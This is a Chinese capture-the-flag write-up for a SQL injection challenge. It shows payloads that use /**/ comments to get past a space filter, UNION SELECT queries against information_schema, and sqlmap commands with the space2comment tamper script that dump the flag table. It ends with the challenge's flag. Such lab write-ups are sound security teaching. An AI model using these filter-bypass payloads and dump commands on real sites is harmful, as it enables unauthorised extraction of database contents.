18.简单的sql注入2
分析:
既然是SQL注入,那么我们就要构造注入语句了,这个就要有耐心一个一个去尝试了
输入语句
1'and 1=1 #
和
1'and/**/1=1/**/#后
对比一下,发现是过滤掉了空格,我们用/**/代替空格
(注:baloteli是数据表)
下面就要构造找flag的语句了
查看有哪些数据库
1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1
(个人认为使用这个语句更简洁点:1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata#)
查看有哪些表,1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
查看有哪些列:1'/**/union/**/select/**/column_name/**/from/**/information_schema.columns/**/where/**/'1'='1,可知有flag列,
查看flag数据:1'/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/'1'='1,如下图,flag为flag{Y0u_@r3_5O_dAmn_90Od}
SQLMQL绕过注入:
1.输入
sqlmap -u http://ctf5.shiyanba.com/web/index 2.php?id=1 --tamper= space2comment --current-db
其中: 1.sqlmap :启动sqImap.2.-u :参数指目标的URL。3.--tamper :绕过WAF脚本。4.space2comment : tamper脚本之一用于绕
过过滤空格。5.--current-db 列举当前数据库
2.输入sqlmap -u http://ctf5.shiyanba.com/web/index 2.php?id=1 --tamper= space2comment -D web1 --tables
其中: 1.-D :后面跟数据库的名字。2.--tables :列举库中的表格
3. sqlmap -u http://ctf5.shiyanba.com/web/index.2.php?id=1 --tamper= space2comment -D web1 -T flag --columns
其中: 1.-T :后面跟表格名字。2.--column列举表格中的列名
4.sqlmap -u http://ctf5.shiyanba.com/web/index.2.php?id=1 --tamper= space2comment -D web1 -T flag -C flag --dump
其中: 1.-C后面跟列的名字。2.--dump取出表单所有记录。
结果flag就出来了
3491
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
